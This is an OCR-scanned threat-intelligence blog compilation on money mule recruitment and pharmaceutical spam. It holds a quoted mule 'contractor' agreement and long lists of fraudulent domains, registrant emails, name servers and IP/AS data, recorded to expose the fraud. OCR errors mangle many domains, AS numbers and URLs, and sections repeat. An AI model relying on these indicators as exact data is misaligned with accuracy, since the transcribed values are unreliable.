FINTEC-UK.CO - Email: sons@bz3.ru 
GLEICHFALLS-GROUPINC. CO - Email: tents@ppmaU. 
I-COM PASS-GROUP. CO - Email: wolf@ca4.ru 



IM-SYSCROUP.CO - Email: truce@free-id.ru 
IMSYSTEMS-GROUP.CC - Email: agate@bz3.ru 
INCOGROUP-USA.CO - Email: beams@free-id.ru 

JOURNEY-FINANCIAL. CC - Email: Iulu@ca4.ru 
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LBMGROUPCO.CC - Email: dreamy@ppmail.ru 
LBM-GROUPINC.CO - Email: coma@ca4.ru 
LCD-FIN.CO - Email: salt@free-id.ru 
LCD-FINANCE.CC - Email: fritz@bz3.ru 
MACROTECHINC.CC - Email: cv@yourisp.ru 
MACROTECH-UK.CO - Email: curl@cheapbox.ru 
MALLOW-GROUP.CC - Email: cues@ppmail.ru 
MALLOW-GROUPINC.CO - Email: hn@bz3.ru 
MONEY-VISUALUK.CC - Email: hn@bz3.ru 
MONEYVISUAL-LLC.CO - Email: yam@free-id.ru 
MARFYGROUP.CC - Email: thorny@cheapbox.ru 
MICHAELESGROUP-USA.CO - Email: knelt@ca4.ru 
OLIVER-SONSINC.CC - Email: drub@cheapbox.ru 
ONLINE-SOLUTIONSLLC.CC - Email: coma@ca4.ru 
PEGASLTDUNION.ee - Email: prim@bz3.ru 



PHYSIS-GROUPLLC.CC - Email: tt@ca4.ru 
PHYSISGROUP-LLC.CO - Email: opals@free-id.ru 
PINFOLD-GROUPINC.CO - Email: beams@free-id.ru 
RADIUM-GROUP.CC - Email: spy@yourisp.ru 
RADIUMUK-LTD.CC - Email: socks@cheapbox.ru 
REDISCO-GROUPINC.HK - Email: wimp@ca4.ru 
SANTORINI-FIN.CC - Email: gill@cheapbox.ru 
SANTORINI-FINANCE.CO - Email: foul@yourisp.ru 
SCHNELLER-GROUPINC.CO - Email: foul@yourisp.ru 
SCHWARTZ-BROTHERS.ee - Email: oozed@bz3.ru 
SILVERSUNGROUP-INC.CC - Email: cp@ca4.ru 
SILVERSUN-GROUPUK.CO - Email: cheer@ca4.ru 
SOLUTIONSLTD.ee - Email: h2o@ca4.ru 
STILE-GROUPLLC.CC - Email: ma@free-id.ru 
SUNRISEPR-GROUPLTD.ee - Email: cough@ppmail.ru 
TECHADVINC.CC - Email: chance@cheapbox.ru 
TECHADV-tNC.CC - Email: chance@cheapbox.ru 
TECHOUSE-GROUP.CC - Email: scale@yourisp.ru 
UKTECH-GROUPLLC.CC - Email: cap@ca4.ru 
USGROUP-AMINA.CO - Email: cap@ca4.ru 



USGROUP-REIGN.CO - Email: w@ppmail.ru 
YESGROUP-LLC.CO - Email: twig@ppmaii.ru 
Name servers of notice: 

NS1.LIBUNITAU.CC - 178.162.152.76 (AS28753) - Email: 
ached@yourisp. ru 

NSl.NNSQUE.CC - Email: amok@cheapbox.ru 

NSl.OUVAU.ee - Email: bop@cheapbox.ru 

NSl.PAGEREDNS.CC - 178.162.152.77 (A528753) - Email: 
freer@free-id. ru 

NSl.SURPLUSUSA.CC - 209.159.156.162 (A519318) - 
Email: skulk@ppmail.ru 

NSl.TVSILVAU.CC - Email: fact@ppmail.ru 

NSl.UKNSSPACE.CC - 69.10.44.190 (A519318) - Email: 
gravy@ca4.ru 

nsl.uksource.ee - 69.10.44.189 (AS 19318) - Email: 
liver@cheapbox. ru 

NSl.USABONDS.CC - Email: bart@cheapbox.ru 

NS2.AUSTDEC.CC - 66.199.236.114 (AS15149) - Email: 
bold@yourisp. ru 

NS2.COUKSNS.ee - 122.70.148.179 (AS55462) - Email: 
preen@ppmail. ru 
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ns2.gbtrade.cc - 66.199.236.114 (A515149) - Email: 
ct@yourisp.ru 

NS2.OUVAU.CC - Email: bop@cheapbox.ru 

NS2.RINGTONS.ee - 66.199.236.115 (AS 15149) - Email: 
aaron@cheapbox. ru 

NS2.TVSILVAU.CC - Email: fact@ppmail.ru 

NS2.USAFUNDS.CC - 76.73.47.28 (AS30058) - Email: 
tile@yourisp.ru 

NS2.ZONENSUK.CC -178.162.181.11 (AS28753) - Email: 
rooms@ppmail. ru 

NS3.AUSTDEC.CC -178.162.181.11 (AS28753) - Email: 
bold@yourisp. ru 

NS3.FOLOWDNS.CC -178.162.181.11 (AS28753) - Email: 
dyed@bz3.ru 

NS3.SDNSAU.CC - Email: level@cheapbox.ru 

NS3.SURPLUSUSA.CC - 69.50.192.97 (AS18866) - Email: 
skulk@ppmail. ru 

NS3.TVSILVAU.CC - Email: fact@ppmail.ru 

NS3.UKCCONS.ee -178.162.181.11 (AS28753) - Email: 
ted@cheapbox. ru 

NS3.UKDNS.CC - 66.199.236.116 (AS 15149) - Email: 
append@free-id. ru 

ns3.ukearnings.ee -178.162.181.11 (AS28753) - Email: 
bf@free-id.ru 



ASs of notice using standart nsl;ns2; ns3 structure: 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS19318 - NJIIX-1 NJUX.net HOB Meadowlands Pkwy 
Secaucus, NJ 07094 +1.201.605.1425 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS 15149 - EZZI-101-BGP EZZI 

- Long term trends - "from mule inventory to 
transactions inventory" 

With the [4]localization and standardization/template- 
tization of the entire money mule recruitment 
process an every day's reality, quality assurance and 
diversification of the markets/market segments in order to 
increase the probability of successful social engineering 
attack, will start taking place. Moreover, the current 
template driven recruitment ecosystem will inevitably start 
taking advantage of basic concepts such as geolocation and 
content 

cloaking, in order to once again increase the probability for 
converting a web site visitor into a mule. 

At an invite-only conference that I attended in September, 
2010, someone from the audience asked me a 

rather interesting question. Does it really matter how many 
mules are recruited by a particular syndicate, and most 
importantly, can we talk about average number of 
days/weeks/hours by the time the mule gets busted, and 
can no 


longer offer his/her services? 



In the long term, we're inevitably going to witness the 
migration from building inventories of mules to transaction- 
driven mule recruitment model where the capability-driven 
mentality surpasses the mule inventory building one. 

The number of possible transactions with success rates 
based on historical performance, combined with an infinite 
loop of recruitment is what will drive the entire mule 
recruitment ecosystem. 

Related posts: 

[5] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[7] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[9] Money Mule Recruiters on Yahoo! 's Web Hosting 

[lOJDissecting an Ongoing Money Mule Recruitment 
Campaign 

[11] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[12] Keeping Reshipping Mule Recruiters on a Short Leash 

[13] Keeping Money Mule Recruiters on a Short Leash 

[14] Standardizing the Money Mule Recruitment Process 



[15] Inside a Money Laundering Group's Spamming 
Operations 
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[16] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[17] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [18]Dancho Danchev's 
blog. 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Five (2011-01-31 12:58) 

With money mule recruitment continuing to represent the 
most actively used risk-forwarding tactic within the 














































cybercrime ecosystem for the purpose of securely 
distribution fraudulently obtained funds, part five of the " 

[lJKeeping Money Mule Recruiters on a Short Leash" 

series are here to stay 

What's particularly interesting about the money mule 
recruitment domain portfolio that I'll expose, is the logi¬ 
cal progression from bogus companies offering financial 
services, to a diverse set of companies occupying multiple 
markets/covering different market segments. 

- Current trends - Localization and 
standardiza tion/templa te-tiza tion 

A great example of this trend - largely driven by the 

[2]standardization and template-zation of money 
mule 

recruitment sites as a service- is Schwartz & Brothers 
LLC (schwartz-brothers.cc). 

" Schwartz & Brothers LLC is the first choice for artists and 
buyers alike! Schwartz & Brothers LLC is an effective tool 
for the artist and emerging artist to market and promote 
their art in a professional and inexpensive manner. 

We will market your art to the international community of 
art buyers. Whether you are looking to buy or sell original 
art, Schwartz & Brothers LLC is the premier art site for those 
seeking to buy or sell original art online. " 
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From financial services to an entirely new market segment, 
whereas the entire recruitment process remains pretty 


static, excluding several time quality assurance oriented 
details. For instance, every potential mule is required to 
download a entry level job psychological test, which 
surprisingly asks directly whether the mule is from 
Australia, next to automatically choosing Australia as a 
country of origin at a later stage throughout the registration 
process. 

Moreover, in the context of quality assurance, the recruiters 
also ask the applicant" Are you/were you con-victed? " in 
an attempt to combine the survey results with other details 
such the opening date of the bank account, as well as the 
average daily/weekly/monthly amount transferred. 

- The Terms of Service 
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" DUTIES: 

The Contractor undertakes the responsibility to receive 
payments from the Clients of the Company to his personal 
bank account, withdraw cash and to process payments to 
the Company's partners by Western Union or MoneyGram 

money transfer system within one (1) day. He/s he will report 
directly to the senior manager and to any other party 
designated by the senior manager in connection with the 
performance of the duties under this Agreement and shall 
fulfill any other duties reasonably requested by the 
Company and agreed to by the Contractor. 


CONFIDENTIALITY: 


The Contractor acknowledges that during the engagement 
he will have access to and become acquainted with 

various trade secrets, inventions, innovations, processes, 
information, records and specifications owned or licensed 
by the Company and/or used by the Company in connection 
with the operation of its business including, 

without limitation, the Company's business and product 
processes, methods, customer lists, accounts and 
procedures. 

The Contractor agrees that he will not disclose any of the 
aforesaid, directly or indirectly, or use any of them in any 
manner, either during the term of this Agreement or at any 
time thereafter. AH files, records, documents, blueprints, 
specifications, information, letters, notes, media lists, 
original artwork/creative, notebooks, and similar items 
relating to the business of the Company, whether prepared 
by the Contractor or otherwise coming into his possession, 
shall remain the exclusive property of the Company. 
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The Contractor shall not retain any copies of the foregoing 
without the Company's prior written permission. 

The Contractor further agrees that he will not disclose his 
retention as an independent contractor or the terms of this 
Agreement to any person without the prior written consent 
of the Company and shall at all times preserve the 
confidential nature of his relationship to the Company and 
of the services hereunder. 

If the Contractor releases any of the above information to 
any parties outside of this company, such as per- 



sonal friend, close relatives or other Financial Institutions 
such as a Bank or other Financial Firms, such could be 
considered grounds for immediate termination. If the 
Contractor is ever in doubt of what information can be 
released and when, the Contractor will contact their 
superior right away 

TERMS OF ENGAGEMENT: 

The Contractor is engaged by the Company on terms of 
thirty-days (30) probationary period. During the 
probationary 

period the Company undertakes to pay to the 
Contractor the base salary amounting to AUD 2300 
per month 

plus 8 % commission from each payment processing 
operation. After the probationary period the 
Company 

agrees to revise and raise the base salary to 3000 
USD. The Company has the right to cancel this Agreement 
at any time within the probationary period or refuse to 
extend it after that, should the Contractor refuse to fulfill 
his/her obligations under this Agreement or fulfills them not 
in good faith. The Contractor has the right to terminate the 
Agreement at any time on condition that he/she has 
processed all previous payments and has no new 
instructions. 

COMPENSATION: 

The Company undertakes to pay taxes accrued in 
connection with money transfer. The Company shall also 
reimburse part of expenses which are incurred in 



connection with money transfer by Western Union or 
MoneyGram systems 

(should money transfer charges exceed 3 %, i.e. 
commission for payment processing operation). The above 
difference will be automatically added to the base salary of 
the Contractor and paid once per month together with the 
base salary. 

The Company shall have the right to decrease the 
Contractor's commission in case the payment processing 

terms were violated by the Contractor. Should the 
Contractor delays re-sending money accepted to his bank 
account for the period exceeding one (1) day without any 
explicit reason, the Company shall have the right to impose 
sanctions on the Contractor if only the delay has not been 
caused by the Force Majeur circumstances and to apply to 
the arbitration and claim for the reimburse of the amount 
transferred to his account or for compensation for other 
damage if any, evicted due to the delay. 

The Contractor may take days off at any time and at his/her 
option upon giving five (5) working days advance 

notice in writing or three (3) working days advance notice 
via e-mail or fax to the Company in order that the latter 
may abstain from charging the Contractor with new 
instructions. However, salary for each day-off is deducted 
from the Contractor's base salary. " 

- OSINT data for money mule recruitment sites 

The following portfolio of money mule recruitment domains 
appears to have been registered using automated email 



registration tools, with the potential for [3]CAPTCHA 
outsourcing clearly considered by the malicious parties, 
taking into consideration the even decreasing price for 
solving CAPTCHA challenges. 

4STAR-SOLUTIONS.CC - Email: urge@bz3.ru 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru 

ACOONGROUP-LLC.CO - Email: jx@ppmail.ru 

AIMIC-GROUPLLC.CC - 98.141.220.118 - Email: 
aryan@ppmail. ru 

AMINA-GROUPCO.CO - Email: beige@ca4.ru 
AMINA-GROUPINC.CC - Email: zowie@yourisp.ru 
AMINAORG.CC - Email: range@ppmail.ru 
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ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHISGOLDGROUP-INC. CO Email: ira@bz3.ru 
AUS-FINANCE.ee - Email: ours@ca4.ru 

BREDGAR-GROUPLLC.CC - Email: zoe@ca4.ru 
BREDGARGROUP-LLC.CO - Email: judo@free-id.ru 
CESIS-GROUPLLC.CC - Email: el@cheapbox.ru 
CESISGROUP-LLC.CC - Email: flip@free-id.ru 


CESIS-GROUPLLC.CO - Email: our@ca4.ru 
COCOONGROUP-LLC.HK - Email: most@cheapbox.ru 
CORES-GROUP.CC - Email: jaunt@cheapbox.ru 
CORESGROUP-INC.CO - Email: yule@cheapbox.ru 
CORES-GROUPLTD.CO - Email: iiszt@bz3.ru 
CRAFT-GROUPNET.CC - Email: room@yourisp.ru 
DILIGENCE-GROUP. CO - Email: twig@ppmail.ru 
DILIGENCE-GROUPINC.CC - Email: till@cheapbox.ru 
DUNCROFT-GROUP-INC.CC - Email: swiss@ca4.ru 
DUNCROFTGROUP-INC.CO - Email: shoot@ppmail.ru 
ELSDEN-GROUPINC.HK - Email: lost@ppmail.ru 
FARLINE-FIN.CO - Email: pecks@free-id.ru 
FARLINE-FININC.CC - Email: cynic@free-id.ru 
FILEGROUP-LLC.CO - Email: knelt@ca4.ru 
FtNTEC-LTD.ee - Email: w@yourisp.ru 
FINTEC-UK.CO - Email: sons@bz3.ru 
GLEICHFALLS-GROUPINC. CO - Email: tents@ppmaU. 
I-COM PASS-GROUP. CO - Email: wolf@ca4.ru 
IM-SYSGROUP.CO - Email: truce@free-id.ru 
IMSYSTEMS-GROUP.CC - Email: agate@bz3.ru 



INCOCROUP-USA.CO - Email: beams@free-id.ru 

JOURNEY-FINANCIAL. CC - Email: Iulu@ca4.ru 
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LBMCROUPCO.CC - Email: dreamy@ppmail.ru 
LBM-CROUPINC.CO - Email: coma@ca4.ru 
LCD-FIN.CO - Email: salt@free-id.ru 
LCD-FINANCE.CC - Email: fritz@bz3.ru 
MACROTECHINC.CC - Email: cv@yourisp.ru 
MACROTECH-UK.CO - Email: curi@cheapbox.ru 
MALLOW-GROUP.CC - Email: cues@ppmail.ru 
MALLOW-GROUPINC.CO - Email: hn@bz3.ru 
MONEY-VISUALUK.CC - Email: hn@bz3.ru 
MONEYVISUAL-LLC.CO - Email: yam@free-id.ru 
MARFYGROUP.CC - Email: thorny@cheapbox.ru 
MICHAELESGROUP-USA.CO - Email: knelt@ca4.ru 
OLIVER-SONSINC.CC - Email: drub@cheapbox.ru 
ONLINE-SOLUTIONSLLC.CC - Email: coma@ca4.ru 
PEGASLTDUNION.ee - Email: prim@bz3.ru 
PHYSIS-GROUPLLC.CC - Email: tt@ca4.ru 
PHYSISGROUP-LLC.CO - Email: opals@free-id.ru 



PINFOLD-GROUPINC.CO - Email: beams@free-id.ru 
RADIUM-GROUP.CC - Email: spy@yourisp.ru 
RADIUMUK-LTD.CC - Email: socks@cheapbox.ru 

REDISCO-GROUPINC.HK - Email: wimp@ca4.ru 
SANTORINI-FIN.CC - Email: gill@cheapbox.ru 
SANTORINI-FINANCE.CO - Email: foul@yourisp.ru 
SCHNELLER-GROUPINC.CO - Email: foul@yourisp.ru 
SCHWARTZ-BROTHERS.ee - Email: oozed@bz3.ru 
SILVERSUNGROUP-INC.CC - Email: cp@ca4.ru 
SILVERSUN-GROUPUK.CO - Email: cheer@ca4.ru 
SOLUTIONSLTD.ee - Email: h2o@ca4.ru 
STILE-GROUPLLC.CC - Email: ma@free-id.ru 
SUNRISEPR-GROUPLTD.ee - Email: cough@ppmail.ru 
TECHADVINC.CC - Email: chance@cheapbox.ru 
TECHADV-INC.CC - Email: chance@cheapbox.ru 
TECHOUSE-GROUP.CC - Email: scale@yourisp.ru 
UKTECH-GROUPLLC.CC - Email: cap@ca4.ru 
USGROUP-AMINA.CO - Email: cap@ca4.ru 
USGROUP-REIGN.CO - Email: w@ppmail.ru 
YESGROUP-LLC.CO - Email: twig@ppmail.ru 



Name servers of notice: 


NS1.LIBUNITAU.CC - 178.162.152.76 (A528753) - Email: 
ached@yourisp. ru 

NSl.NNSQUE.CC - Email: amok@cheapbox.ru 

NSl.OLIVAU.ee - Email: bop@cheapbox.ru 

NSl.PAGEREDNS.ee - 178.162.152.77 (A528753) - Email: 
free r@ free-id. ru 

NSl.SURPLUSUSA.CC - 209.159.156.162 (A519318) - 
Email: skulk@ppmail.ru 

NSl.TVSILVAU.CC - Email: fact@ppmail.ru 

NSl.UKNSSPACE.CC - 69.10.44.190 (A519318) - Email: 
gravy@ca4.ru 

nsl.uksource.ee - 69.10.44.189 (AS 19318) - Email: 
liver@cheapbox. ru 

NSl.USABONDS.CC - Email: bart@cheapbox.ru 

NS2.AUSTDEC.CC - 66.199.236.114 (AS15149) - Email: 
bold@yourisp. ru 

NS2.COUKSNS.ee - 122.70.148.179 (AS55462) - Email: 
preen@ppmaU. ru 
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ns2.gbtrade.ee - 66.199.236.114 (AS15149) - Email: 
ct@yourisp.ru 

NS2.OLlVAU.CC - Email: bop@cheapbox.ru 



NS2.RINCTONS.CC - 66.199.236.115 (AS 15149) - Email: 
aaron@cheapbox. ru 

NS2.TVSILVAU.ee - Email: fact@ppmaii.ru 

NS2.USAFUNDS.CC - 76.73.47.28 (AS30058) - Email: 
tile@yourisp.ru 

NS2.ZONENSUK.CC -178.162.181.11 (AS28753) - Email: 
rooms@ppmail. ru 

NS3.AUSTDEC.CC -178.162.181.11 (AS28753) - Email: 
bold@yourisp. ru 

NS3.FOLOWDNS.CC -178.162.181.11 (AS28753) - Email: 
dyed@bz3.ru 

NS3.SDNSAU.CC - Email: level@cheapbox.ru 

NS3.SURPLUSUSA.CC - 69.50.192.97 (AS18866) - Email: 
skulk@ppmail. ru 

NS3.TVSILVAU.ee - Email: fact@ppmail.ru 

NS3.UKCCONS.ee -178.162.181.11 (AS28753) - Email: 
ted@cheapbox. ru 

NS3.UKDNS.CC - 66.199.236.116 (AS 15149) - Email: 
append@free-id. ru 

ns3.ukearnings.ee -178.162.181.11 (AS28753) - Email: 
bf@free-id.ru 

ASs of notice using standart nsl;ns2; ns3 structure: 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 



AS19318 - NJIIX-1 NJIIX.net HOB Meadowlands Pkwy 
Secaucus, NJ 07094 +1.201.605.1425 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS 15149 - EZZI-101-BGP EZZI 

- Long term trends - "from mule inventory to 
transactions inventory" 

With the [4]localization and standardization/template - 
tization of the entire money mule recruitment 
process an every day's reality, quality assurance and 
diversification of the markets/market segments in order to 
increase the probability of successful social engineering 
attack, will start taking place. Moreover, the current 
template driven recruitment ecosystem will inevitably start 
taking advantage of basic concepts such as geolocation and 
content 

cloaking, in order to once again increase the probability for 
converting a web site visitor into a mule. 

At an invite-only conference that I attended in September, 
2010, someone from the audience asked me a 

rather interesting question. Does it really matter how many 
mules are recruited by a particular syndicate, and most 
importantly, can we talk about average number of 
days/weeks/hours by the time the mule gets busted, and 
can no 

longer offer his/her services? 

In the long term, we're inevitably going to witness the 
migration from building inventories of mules to transaction- 



driven mule recruitment model where the capability-driven 
mentality surpasses the mule inventory building one. 

The number of possible transactions with success rates 
based on historical performance, combined with an infinite 
loop of recruitment is what will drive the entire mule 
recruitment ecosystem. 

Related posts: 

[5] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[7] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[9] Money Mule Recruiters on Yahoo! 's Web Hosting 

[lOJDissecting an Ongoing Money Mule Recruitment 
Campaign 

[11] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[12] Keeping Reshipping Mule Recruiters on a Short Leash 

[13] Keeping Money Mule Recruiters on a Short Leash 

[14] Standardizing the Money Mule Recruitment Process 

[15] inside a Money Laundering Group's Spamming 
Operations 
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[16] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[17] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [18]Dancho Danchev's 
blog. 

1. htto.V/ddanchev.bio as oot.com/2010/04/keeoina-mone v- 
mule-recruiters-on-short.html 

2. htto://ddanchev.bio as oot. com/2009/10/standardizin a- 
monev-mule-recruitment.html 

3. httoV/www.zdnet.com/bioa/securitv/inside-indias- 
ca otcha-soivino-econom v/1835 

4. htto://ddanchev.bio as oot. com/2009/10/standardizin a- 
mone v-mule-recruitment, htrni 

5. htto.V/ddanchev.bio as oot.com/2010/04/dns- 
infrastructure-of-monev-mule.html 

6. htto.V/ddanchev.bio as oot.com/2010/04/keeoina-mone v- 
muie - recruiters - on-short, h tmi 

7. htto://ddanchev.bio as oot.com/2010/03/monev-muie- 
recruitment-camoaian-servina.html 

8. htto.V/ddanchev.bio as oot.com/2010/03/keeoina-mone v- 
muie-recruiters-on-short.html 

9. htto.V/ddanchev.bio as oot.com/2010/03/monev-muie- 
recruiters-on-vahoos-web.html 











































10. htto.V/ddanchev. blo as oot. com/2010/02/dissectin a- 
on aoina-monev-mule.html 

11. htto.V/ddanchev. blo as oot. com/2010/02/keeoina-mone v- 
m ule - recruiters - on - short. h tml 

12. htto.V/ddanchev. blo as oot. com/2009/12/keeoin a- 
reshi o oina-mule-recruiters-on.html 

13. htto.V/ddanchev. blo as oot. com/2009/11/keeoina-mone v- 
m ule-reeruiters - on-sh ort, h tml 

14. htto.V/ddanchev. blo as oot. com/2009/10/standardizin a- 
monev-mule-recruitment.html 

15. htto.V/ddanche i/. blo as oot. com/2009/05/inside-mone v- 
launderin a- arouDs-soammina.html 

16. httoV/ddanchev.blo as oot.com/2008/07/monev-mule- 
recruiters-use-asoroxs-fast.html 

17. htto.V/ddanchev.blo as oot.com/2008/10/monev-mules- 
s vndicate-activelv.html 

18. htto.V/ddanchev. blo as oot. com/ 
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Whatever the cybercrime marketplace demands, the 
cybercrime marketplace supplies. 
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Spamvertised Portfolio of Fraudulent/Pharmaceutical 
Domains (2011-02-14 20:14) 

Just in time for Saint Valentin's days, pharmaceutical 
scammers have switched their localized templates to a 
more romantic theme. 

The domains have been registered using three separate 
Yahoo! Mail accounts, and are ail responding to a sin¬ 
gle IP - 115.239.229.196; AS4134, CHINA-TELECOM China 
Telecom with four currently active [lJZeuS C &Cs within the 
same AS - aiyanxinxi.com; wawnet.net; 
www.zuihouyi. com; nascetur. com. 

abpiiisw.ru - Email: nikitapetuhov@yahoo.com 
alpillsw.ru - Email: nikitapetuhov@yahoo.com 
alypillsw.ru - Email: nikitapetuhov@yahoo.com 
annpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
asapillsm.ru - Email: alexeycheremisinov@yahoo.com 
barpillsw.ru - Email: nikitapetuhov@yahoo.com 
bazpiiiso.ru - Email: muzaievskayaekaterina@yahoo.com 
bupillsp.ru - Email: muzaievskayaekaterina@yahoo.com 


capillso.ru - Email: muzalevskayaekaterina@yahoo.com 
carpillsw.ru - Email: nikitapetuhov@yahoo.com 
ceipiiisw.ru - Email: nikitapetuhov@yahoo.com 
chapillsm.ru - Email: alexeycheremisinov@yahoo 
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chapillso.ru - Email: muzaievskayaekaterina@yahoo.com 
chpillso.ru - Email: muzalevskayaekaterina@yahoo.com 
cinpillsp.ru - Email: nikitapetuhov@yahoo.com 
conpillsw.ru - Email: alexeycheremisinov@yahoo.com 
copillsm.ru - Email: alexeycheremisinov@yahoo.com 
copillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
corpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
crpillsm.ru - Email: alexeycheremisinov@yahoo.com 
depillsm.ru - Email: alexeycheremisinov@yahoo.com 
depiiiso.ru - Email: muzaievskayaekaterina@yahoo.com 
despiiisw.ru - Email: nikitapetuhov@yahoo,cim 
dipillsm.ru - Email: alexeycheremisinov@yahoo.com 
dipillsw.ru - Email: nikitapetuhov@yahoo.com 
duppillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
enkpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 



estpillsm.ru - Email: alexeycheremisinov@yahoo.com 
ethpillsm.ru - Email: aiexeycheremisinov@yahoo.com 
exapillsw.ru - Email: nikitapetuhov@yahoo.com 
fHpiilso.ru - Email: alexeycheremisinov@yahoo.com 
fipillso.ru - Email: alexeycheremisinov@yahoo.com 
funpills.ru - Email: muzalevskayaekaterina@yahoo.com 
glpillso.ru - Email: alexeycheremisinov@yahoo.com 
haupillso.ru - Email: alexeycheremisinov@yahoo.com 
hipills.ru - Email: muzalevskayaekaterina@yahoo.com 
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invpillso.ru - Email: alexeycheremisinov@yahoo.com 
isapillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
itepillsw.ru - Email: nikitapetuhov@yahoo.com 
jopiiiso.ru - Email: alexeycheremisinov@yahoo.com 
kipillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
kipillsw.ru - Email: nikitapetuhov@yahoo.com 
krpillsw.ru - Email: nikitapetuhov@yahoo.com 
lopillso.ru - Email: alexeycheremisinov@yahoo.com 
lopillsw.ru - Email: nikitapetuhov@yahoo.com 


mapillso.ru - Email: aiexeycheremisinov@yahoo.com 
marpillsw.ru - Email: nikitapetuhov@yahoo.com 
metpiiiso.ru - Email: alexeycheremisinov@yahoo.com 
monpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
nopillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
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odpillsw.ru - Email: nikitapetuhov@yahoo.com 
panpillsw.ru - Email: nikitapetuhov@yahoo.com 
phpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsbi.ru - Email: simakovs@yahoo.com 
pillsly.ru - Email: alexeycheremisinov@yahoo.com 
pillsnk.ru - Email: alexeycheremisinov@yahoo.com 
pillsoep.ru - Email: alexeycheremisinov@yahoo.com 
piiisoes.ru - Email: alexeycheremisinov@yahoo.com 
piiisoff.ru - Email: alexeycheremisinov@yahoo.com 
pillsogn.ru - Email: alexeycheremisinov@yahoo.com 
piiisois.ru - Email: alexeycheremisinov@yahoo.com 
pillsoke.ru - Email: alexeycheremisinov@yahoo.com 
pillsokt.ru - Email: alexeycheremisinov@yahoo.com 


pillsong.ru - Email: alexeycheremisinov@yahoo.com 
pillsont.ru - Email: alexeycheremisinov@yahoo.com 
pillsooc.ru - Email: alexeycheremisinov@yahoo.com 
pillsopa.ru - Email: alexeycheremisinov@yahoo.com 
pillsore.ru - Email: alexeycheremisinov@yahoo.com 
pilisosa.ru - Email: alexeycheremisinov@yahoo.com 
pilisosl.ru - Email: alexeycheremisinov@yahoo.com 
piiisoti.ru - Email: alexeycheremisinov@yahoo.com 
pillsouc.ru - Email: alexeycheremisinov@yahoo.com 
pillsove.ru - Email: alexeycheremisinov@yahoo.com 
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pillspba.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsper.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspiz.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspnc.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspne.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspno.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspns.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsppp.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsppt.ru - Email: muzalevskayaekaterina@yahoo.com 



pillspra.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspre.ru - Email: muzaievskayaekaterina@yahoo.com 
pillsprg.ru - Email: muzaievskayaekaterina@yahoo.com 
piiispsa.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspss.ru - Email: muzalevskayaekaterina@yahoo.com 
pillspst.ru - Email: muzalevskayaekaterina@yahoo.com 
piiispti.ru - Email: muzalevskayaekaterina@yahoo.com 
pillsqu.ru - Email: alexeycheremisinov@yahoo.com 
pillswal.ru - Email: nikitapetuhov@yahoo.com 
pillswam.ru - Email: nikitapetuhov@yahoo.com 
pillswar.ru - Email: nikitapetuhov@yahoo.com 
pillswau.ru - Email: nikitapetuhov@yahoo.com 
pillswcu.ru - Email: nikitapetuhov@yahoo.com 
pillswed.ru - Email: nikitapetuhov@yahoo.com 
piilswep.ru - Email: nikitapetuhov@yahoo.com 
pillswer.ru - Email: nikitapetuhov@yahoo.com 
piiiswet.ru - Email: nikitapetuhov@yahoo.com 
pillswey.ru - Email: nikitapetuhov@yahoo.com 
piiiswis.ru - Email: nikitapetuhov@yahoo.com 
pillswng.ru - Email: nikitapetuhov@yahoo.com 



pillswol.ru - Email: nikitapetuhov@yahoo.com 
See also: 

• [ 2 ] Inside an affiliate spam program for 
pharmaceuticals 

• [3]Survey: Millions of users open spam emails, click 
on links 

• [4] Microsoft's Bing invaded by pharmaceutical 
scammers 

pillswre.ru - Email: nikitapetuhov@yahoo.com 
pillswss.ru - Email: nikitapetuhov@yahoo.com 
pillswti.ru - Email: nikitapetuhov@yahoo.com 
pillswtt.ru - Email: nikitapetuhov@yahoo.com 
pillswwa.ru - Email: nikitapetuhov@yahoo.com 
pillszva.ru - Email: nikitapetuhov@yahoo.com 
pillszzi.ru - Email: nikitapetuhov@yahoo.com 
propillsp.ru - Email: muzalevskayaekaterina@yahoo.com 
puppillso.ru - Email: alexeycheremisinov@yahoo.com 
rempillso.ru - Email: alexeycheremisinov@yahoo.com 
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nsl.alemedicp.ru 


nsl.bacdns.ru 

115.239.229.196 

nsl.bacmedicp.ru 

115.239.229.196 

nsl.camdns.ru 

115.239.229.196 

nsl.delmedicv.ru 

115.239.229.196 

nsl.dnsbest.ru 

115.239.229.196 

